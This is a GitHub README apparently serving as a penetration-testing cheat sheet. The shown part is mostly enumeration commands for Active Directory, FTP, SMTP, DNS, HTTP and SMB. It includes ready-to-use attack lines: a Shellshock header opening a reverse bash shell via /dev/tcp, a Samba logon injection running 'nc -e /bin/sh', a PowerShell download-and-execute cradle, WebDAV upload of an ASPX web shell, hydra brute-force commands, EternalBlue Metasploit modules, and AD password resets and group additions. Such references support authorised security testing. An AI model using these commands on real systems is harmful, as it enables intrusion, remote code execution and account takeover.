jwardsmith/Penetration-Testing
GitHub: jwardsmith/Penetration-Testing
一份覆盖渗透测试全流程的命令与工具速查清单,帮助安全团队快速执行信息收集、漏洞利用与横向移动。
Stars: 8 | Forks: 3
# Penetration Testing
## Overview
1. - [Passive Enumeration](#1---passive-enumeration)
2. - [Active Enumeration](#2---active-enumeration)
3. - [Exploitation](#3---exploitation)
4. - [Lateral Movement](#4---lateral-movement)
5. - [Privilege Escalation](#5---privilege-escalation)
6. - [Brute Force](#6---brute-force)
7. - [Password Dumping](#7---password-dumping)
8. - [File Transfers](#8---file-transfers)
9. - [Restricted Shell Escapes](#9---restricted-shell-escapes)
10. - [Shells](#10---shells)
11. - [Evasion](#11---evasion)
12. - [Online Resources](#12---online-resources)
13. - [Browser Plugins](#13---browser-plugins)
14. - [Exploits](#14---exploits)
15. - [Exploit Research](#15---exploit-research)
## #1. - Passive Enumeration
- Searchcode
https://searchcode.com/
- Shodan
https://www.shodan.io/
$ for i in $(cat ip-addresses.txt);do shodan host $i;done
- Certificate Search
https://crt.sh/
$ curl -s https://crt.sh/\?q\=\&output\=json | jq .
$ curl -s https://crt.sh/\?q\=\&output\=json | jq . | grep name | cut -d":" -f2 | grep -v "CN=" | cut -d'"' -f2 | awk '{gsub(/\\n/,"\n");}1;' | sort -u
- Google Dorks
https://www.exploit-db.com/google-hacking-database
intext: inurl:amazonaws.com
intext: inurl:blob.core.windows.net
- Whois
https://domain.glass/
https://whois.domaintools.com/
- Cloud Bucket Search
https://buckets.grayhatwarfare.com/
- ASN/IP Registrars
https://www.iana.org/
https://www.arin.net/
https://www.ripe.net/
https://bgp.he.net/
- Domain Registrars & DNS
https://www.domaintools.com/
https://securitytrails.com/
https://lookup.icann.org/en
https://viewdns.info/
- Social Media
https://www.linkedin.com/
https://www.facebook.com/
https://www.instagram.com/
https://x.com/
- Cloud & Development Storage Spaces
https://github.com/
- Breach Data Sources
https://haveibeenpwned.com/
https://www.dehashed.com/
- Trufflehog
https://github.com/trufflesecurity/truffleHog
## #2. - Active Enumeration
- Ping
$ for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
C:\> for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"
PS C:\> 1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}
- Fping
https://fping.org/
fping -asgq 172.16.5.0/23
- Nmap
$ sudo nmap --script-updatedb
$ nmap -sn
$ nmap -sC -sV -p- -Pn -A
$ nmap -sC -sV -p- -Pn -A -sU
$ nmap --top-ports=100
$ nmap --script vuln
$ nmap -sV --script banner
$ nmap -sV --packet-trace --reason
$ nmap -S -e tun0
$ nmap -D RND:5
$ nmap --source-port
$ nmap -oA scan
$ nmap -iL hosts.txt -oA scan
$ xsltproc target.xml -o target.html
- Nessus
$ dpkg -i Nessus-8.15.1-ubuntu910_amd64.deb
$ sudo systemctl start nessusd.service
https://localhost:8834
https://raw.githubusercontent.com/eelsivart/nessus-report-downloader/master/nessus6-report-downloader.rb
./nessus_downloader.rb
- OpenVAS
$ sudo apt-get install gvm && openvas
$ gvm-setup
$ gvm-start
https://github.com/TheGroundZero/openvasreporting
$ python3 -m openvasreporting -i report-2bf466b5-627d-4659-bea6-1758b43235b1.xml -f xlsx
- Netcat
$ nc -nv
- TCPDump
$ sudo tcpdump -i ens224
- Wireshark
$ sudo -E wireshark
- NetMiner
https://www.netminer.com/en/product/netminer.php?ckattempt=1
- Living Off The Land (LOLBAS)
C:\> net accounts
C:\> net accounts /domain
C:\> net user
C:\> net user /domain
C:\> net user /domain
C:\> net localgroup
C:\> net localgroup administrators
C:\> net localgroup administrators /domain
C:\> net group
C:\> net group /domain
C:\> net group "Domain Computers" /domain
C:\> net group "Domain Controllers" /domain
C:\> net group "Domain Admins" /domain
C:\> net share
C:\> net use x: \\
C:\> net view
C:\> net view /all /domain[:]
C:\> net view \computer /ALL
C:\> net view /domain
C:\> hostname
C:\> [System.Environment]::OSVersion.Version
C:\> wmic qfe get Caption,Description,HotFixID,InstalledOn
C:\> wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List
C:\> wmic process list /format:list
C:\> wmic ntdomain list /format:list
C:\> wmic useraccount list /format:list
C:\> wmic group list /format:list
C:\> wmic sysaccount list /format:list
https://gist.github.com/xorrior/67ee741af08cb1fc86511047550cdaf4
C:\> dsquery user
C:\> dsquery computer
C:\> dsquery * "CN=Users,DC=,DC="
C:\> dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl
C:\> dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName
C:\> ipconfig /all
C:\> arp -a
C:\> route print
C:\> set
C:\> echo %USERDOMAIN%
C:\> echo %logonserver%
C:\> systeminfo
PS C:\> Get-Module
PS C:\> Get-ExecutionPolicy -List
PS C:\> Set-ExecutionPolicy Bypass -Scope Process
PS C:\> Get-ChildItem Env: | ft Key,Value
PS C:\> Get-Content $env:APPDATA\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
PS C:\> powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); "
- PowerView
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
PS C:\> Import-Module .\PowerView.ps1
PS C:\> Export-PowerViewCSV
PS C:\> ConvertTo-SID
PS C:\> Convert-NameToSid
PS C:\> $sid=Convert-NameToSid "Domain Users"
PS C:\> Get-DomainPolicy
PS C:\> Get-DomainSPNTicket
PS C:\> Get-Domain
PS C:\> Get-DomainController
PS C:\> Get-DomainUser
PS C:\> Get-DomainUser * -spn | select samaccountname
PS C:\> Get-DomainUser -SPN -Domain | select SamAccountName
PS C:\> Get-DomainUser -Identity | select samaccountname,objectsid,memberof,useraccountcontrol |fl
PS C:\> Get-DomainUser -Domain -Identity | select samaccountname,memberof
PS C:\> Get-DomainUser -Identity | Get-DomainSPNTicket -Format Hashcat
PS C:\> Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation
PS C:\> Get-DomainUser -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes
PS C:\> Get-DomainUser * | Select-Object samaccountname,description
PS C:\> Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
PS C:\> Get-DomainComputer
PS C:\> Get-DomainGroup
PS C:\> Get-DomainOU
PS C:\> Get-DomainSID
PS C:\> Find-InterestingDomainAcl
PS C:\> Get-DomainGroupMember
PS C:\> Get-DomainFileServer
PS C:\> Get-DomainDFSShare
PS C:\> Get-DomainGPO
PS C:\> Get-NetLocalGroup
PS C:\> Get-NetLocalGroupMember
PS C:\> Get-NetShare
PS C:\> Get-NetSession
PS C:\> Test-AdminAccess
PS C:\> Find-DomainUserLocation
PS C:\> Find-DomainShare
PS C:\> Find-InterestingDomainShareFile
PS C:\> Find-LocalAdminAccess
PS C:\> Get-DomainTrust
PS C:\> Get-ForestTrust
PS C:\> Get-DomainForeignUser
PS C:\> Get-DomainForeignGroupMember
PS C:\> Get-DomainForeignGroupMember -Domain
PS C:\> Get-DomainTrustMapping
PS C:\> Get-DomainGroupMember -Identity "Domain Admins" -Recurse
PS C:\> Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
PS C:\> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
PS C:\> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
PS C:\> Set-DomainUserPassword -Identity -AccountPassword $damundsenPassword -Credential $Cred -Verbose
PS C:\> Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members '' -Credential $Cred2 -Verbose
PS C:\> Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName
PS C:\> Set-DomainObject -Credential $Cred2 -Identity -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
PS C:\> Set-DomainObject -Credential $Cred2 -Identity -Clear serviceprincipalname -Verbose
PS C:\> Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members '' -Credential $Cred2 -Verbose
PS C:\> $sid= "S-1-5-21-3842939050-3880317879-2865463114-1164" Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} | select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl
PS C:\> Get-NetLocalGroupMember -ComputerName -GroupName "Remote Desktop Users"\
PS C:\> Get-DomainGPO | select displayname
PS C:\> Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid
PS C:\> Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
PS C:\> Get-DomainUser -Domain | select SamAccountName
PS C:\> Get-DomainGroup -Domain -Identity "Enterprise Admins" | select distinguishedname,objectsid
- Active Directory Module
PS C:\> Get-Module
PS C:\> Import-Module ActiveDirectory
PS C:\> Get-ADDomain
PS C:\> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
PS C:\> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
PS C:\> Get-ADTrust -Filter *
PS C:\> Get-ADGroup -Filter * | select name
PS C:\> Get-ADGroup -Identity "Help Desk Level 1" -Properties * | Select -ExpandProperty Members
PS C:\> Get-ADGroup -Identity "Backup Operators"
PS C:\> Get-ADGroupMember -Identity "Backup Operators"
PS C:\> $guid= "00299570-246d-11d0-a768-00aa006e0529" Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * | Select Name,DisplayName,DistinguishedName,rightsGuid | ?{$_.rightsGuid -eq $guid} | fl
PS C:\> foreach($line in [System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")) {get-acl "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}}
PS C:\> ConvertFrom-SddlString
PS C:\> Get-GPO -All | Select DisplayName
PS C:\> Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532
- SharpView
PS C:\> .\SharpView.exe Get-DomainUser -Identity
- BloodHound
$ sudo bloodhound-python -u '' -p '' -ns -d -c all
$ bloodhound-python -d -dc -c All -u -p
$ zip -r mass_bh.zip *.json
$ sudo neo4j start
$ bloodhound
PS C:\> .\SharpHound.exe -c All --zipfilename bloodhound
https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/
- LAPSToolkit
https://github.com/leoloobeek/lapstoolkit
PS C:\> Find-LAPSDelegatedGroups
PS C:\> Find-AdmPwdExtendedRights
PS C:\> Get-LAPSComputers
- FTP (port 21)
$ ftp (anonymous:anonymous)
ftp> dir
ftp> cd
ftp> get
ftp> put
ftp> exit
ftp> passive # if ls is hanging
$ openssl s_client -connect :21 -starttls ftp
$ wget -m --no-passive ftp://anonymous:anonymous@
$ nmap -Pn -v -n -p80 -b anonymous:password@ # https://www.geeksforgeeks.org/what-is-ftp-bounce-attack/
$ hydra -L -p '' -f ftp
https://lftp.yar.ru/
https://www.ncftp.com/
https://filezilla-project.org/
https://www.crossftp.com/
- SSH (port 22)
$ ssh @
$ ssh @@
$ ssh @ -p
$ chmod 600 id_rsa
$ ssh -i id_rsa @
$ ssh @ -o PreferredAuthentications=password
$ ssh-audit.py
$ hydra -L -p '' -f ssh
- Telnet (port 23)
$ telnet
- SMTP (port 25)
$ telnet 25
VRFY root
EXPN root
EXPN all
RCPT TO:root
$ smtp-user-enum -M RCPT -U -D -t
$ host -t MX
$ dig mx | grep "MX" | grep -v ";"
$ host -t A
$ swaks --from --to --header 'Subject: Notification' --body 'Message' --server
$ hydra -L -p '' -f smtp
https://www.thunderbird.net/en-US/
https://www.claws-mail.org/
https://wiki.gnome.org/Apps/Geary
https://www.getmailspring.com/
https://www.mutt.org/
https://mailutils.org/
https://github.com/mogaal/sendemail
https://mxtoolbox.com/
- DNS (udp/port 53)
$ host
$ host -t MX
$ host -t A
$ dig ns @
$ dig mx @
$ dig txt @
$ dig CH TXT version.bind
$ dig soa @
$ dig any @
$ dig axfr @
$ for sub in $(cat /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub. @ | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
$ dnsenum --dnsserver --enum -p 0 -s 0 -o found_subdomains.txt -f /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt
$ for i in $(cat subdomainlist.txt);do host $i | grep "has address" | grep | cut -d" " -f4 >> ip-addresses.txt;done
$ subfinder -d -v
$ fierce --domain
$ ./subfinder -d -v
$ adidnsdump -u \\ ldap://
$ adidnsdump -u \\ ldap:// -r
https://dnsdumpster.com/
$ python sublist3r.py -d
$ ./subbrute.py -s ./names.txt -r ./resolvers.txt # $ echo "" > ./resolvers.txt
https://github.com/EdOverflow/can-i-take-over-xyz
https://www.ettercap-project.org/
https://www.bettercap.org/
- TFTP (udp/port 69)
$ tftp
tftp> get
tftp> put
- HTTP/HTTPS (port 80/443)
Right-Click -> View Page Source
https:///robots.txt
$ gobuster dir -w -u
$ gobuster dir -w -u -x php,html
$ gobuster vhost -w -u
$ gobuster dns -w -d
$ ffuf -u /FUZZ -w
$ curl -IL
$ curl -H 'User-agent: zerodiumsystem("curl ");'
$ curl -i -H "User-agent: () { :;}; /bin/bash -i >& /dev/tcp//443 0>&1" http:///cgi-bin/user.sh
$ feroxbuster -w -u
$ wfuzz -c -w -u http://FUZZ.
$ nikto -h
$ eyewitness -f --web
$ whatweb
$ curl -v -X OPTIONS
$ curl http:// --upload-file test.txt
$ curl -X PUT http:///test.txt -d @test.txt
$ curl -X PUT http:///test.txt --data-binary @cmdasp.aspx
$ curl -X PUT http:///test.txt -d @cmdasp.aspx
$ curl -X MOVE -H 'Destination:http:///cmdasp.aspx' http:///test.txt
$ davtest -url http://
$ cadaver http://
dav:/ put cmdasp.aspx cmdasp.txt
dav:/ put cmdasp.txt cmdasp.aspx
- POP3 (port 110)
$ telnet 110
USER admin
PASS admin
LIST
RETR 1
$ hydra -L -p '' -f pop3
- RPCBIND (port 111)
$ rpcinfo -p
- MSRPC (port 135)
$ wmiexec.py :''@ ""
$ wmiexec.py /:''@
- SMB (port 137/139/445)
$ smbclient -N -L
$ smbclient -L
$ smbclient -L -U
$ smbclient \\\\\\c$
$ smbclient \\\\\\c$ -U
$ smbclient /// -k -c ls -no-pass
$ smbmap -H
$ smbmap -H -u -p
$ smbmap -H -u -p -d
$ smbmap -H -u -p -d -R SYSVOL --dir-only
$ smbmap -H -r
$ smbmap -H --download "\file.txt"
$ smbmap -H --upload test.txt "\file.txt"
smb: \> logon "/=`nc -e /bin/sh`"
smb: \> !ls
$ rpcclient -U ""
rpcclient $> querydominfo
rpcclient $> getdompwinfo
rpcclient $> enumdomusers
rpcclient $> queryuser 0x457
$ for i in $(seq 500 1100);do rpcclient -N -U "" -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
$ samrdump.py
msf> use auxiliary/scanner/smb/smb_version
msf> use auxiliary/scanner/smb/smb_login
msf> use auxiliary/scanner/smb/smb_ms17_010
msf> use exploit/windows/smb/ms17_010_psexec
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> use exploit/windows/smb/ms08_067_netapi
msf> use exploit/multi/samba/usermap_script
msf> use exploit/windows/smb/psexec
$ enum4linux -a
$ enum4linux-ng.py -A -C -oA output
$ crackmapexec smb --shares
$ crackmapexec smb --shares -u '' -p ''
$ crackmapexec smb -u -p ''
$ crackmapexec smb -u -p '' --local-auth
$ crackmapexec smb --shares -u -p ''
$ crackmapexec smb -u -p '' -x 'whoami' --exec-method smbexec
$ crackmapexec smb -u -p '' -X 'Get-Process' --exec-method smbexec
$ crackmapexec smb -u -p '' --loggedon-users
$ crackmapexec smb -u -p '' --users
$ crackmapexec smb -u -p '' --groups
$ crackmapexec smb -u -p '' --shares
$ crackmapexec smb -u -p '' -M spider_plus --share
$ crackmapexec smb -u -p '' --sam
$ crackmapexec smb -u -p '' --pass-pol
$ crackmapexec smb -u -H
$ crackmapexec smb -L | grep gpp
$ crackmapexec smb -u -p -M gpp_autologin
$ impacket-psexec